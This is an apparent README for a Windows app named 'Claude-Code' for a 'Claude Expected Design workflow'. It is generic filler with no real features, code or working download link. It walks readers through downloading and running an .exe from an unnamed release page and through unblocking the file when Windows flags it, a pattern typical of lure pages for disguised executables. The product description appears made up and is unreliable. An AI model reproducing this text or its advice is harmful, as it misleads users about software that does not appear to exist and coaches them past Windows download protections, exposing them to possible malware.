Claude-Code is a Windows app built for the Claude Expected Design workflow. It gives you a clean place to open tasks, view content, and keep your work organized. It is made for end users who want a simple app that opens fast and keeps the interface easy to read.
Use it when you want a focused desktop tool with a clear layout and a low learning curve.
Claude-Code runs on modern Windows systems. For the best result, use:
- Windows 10 or Windows 11
- At least 4 GB of RAM
- 200 MB of free disk space
- A stable internet connection for download and setup
- A standard mouse and keyboard
If your PC can run current Windows apps, it should handle Claude-Code well.
Visit this page to download Claude-Code:
On the release page, look for the latest version. Download the Windows file that matches your PC. If you see more than one file, pick the .exe file for the simplest setup.
- Open the release page.
- Download the Windows file.
- If your browser asks where to save the file, choose a folder you can find again, such as Downloads.
- After the file finishes downloading, open File Explorer.
- Go to the folder that holds the file.
- Double-click the downloaded
.exefile. - If Windows asks for permission, choose Yes or Run.
- Follow the on-screen steps until the app finishes installing.
- Open Claude-Code from your Start menu or desktop shortcut.
If the app opens in a browser-style window, keep the window open while you use it. If it installs as a normal desktop app, open it from the Start menu like any other Windows program.
When you open Claude-Code for the first time, it may take a few seconds to load. This is normal.
After launch, check these items:
- The main window opens without errors
- Text is easy to read
- Buttons respond when you click them
- Any setup prompts are complete
If the app asks for a folder, file, or setting, choose the option that matches your work. Keep the default values if you are unsure.
Claude-Code is designed to keep your workflow simple.
Typical use looks like this:
- Open the app.
- Review the main screen.
- Choose the task or file you want to work with.
- Enter or load your content.
- Save your changes.
- Close the app when you finish.
If the app includes panels, tabs, or sections, use them to move between views. The layout is meant to help you stay on task without hunting through menus.
You may see a settings area with options like these:
- Language
- Theme
- Font size
- Window size
- Startup behavior
- Save location
If you want the easiest setup, keep the default settings. If the text looks small, raise the font size. If the window feels cramped, enlarge it once and keep that size for later use.
Claude-Code may store data in a local folder on your PC. This can include:
- App settings
- User preferences
- Saved work
- Recent files
To keep your files safe, use a folder you can find again, such as Documents or a dedicated project folder. If you move or delete files outside the app, open them again from the new location.
When a new version is posted, return to the release page and download the latest Windows file.
Update steps:
- Open the release page.
- Check the newest release.
- Download the new Windows file.
- Close the current app if it is open.
- Run the new file.
- Follow the prompts to finish the update.
If your settings are stored on your PC, they may stay the same after the update.
If Claude-Code does not start, try these steps:
- Check that the download finished
- Run the file again
- Restart your PC
- Make sure Windows is up to date
- Try a different browser for the download
- Open the file from a local folder, not from inside the browser window
If the app opens but looks broken:
- Maximize the window
- Increase the screen scale in Windows
- Change the app font size if that option exists
- Close and open the app again
If Windows blocks the file:
- Right-click the file
- Open the file properties
- Check whether Windows marked it as blocked
- Allow the file and run it again
Only download Claude-Code from the release page linked above. That keeps you on the correct version and avoids files from other sources.
Before you run any downloaded file, check that the name matches Claude-Code and that it came from the release page. If the file name looks different, return to the page and choose the correct one.
- Keep the installer in your Downloads folder until setup ends
- Create a shortcut if you use the app often
- Use a large window size if you prefer more space
- Save work often if the app gives you a save button
- Close the app through its normal exit option
Claude-Code works well for users who want a clean Windows app for:
- Simple daily tasks
- Reading and reviewing content
- Working through a guided interface
- Keeping one project in one place
- Using a desktop tool without a hard setup process
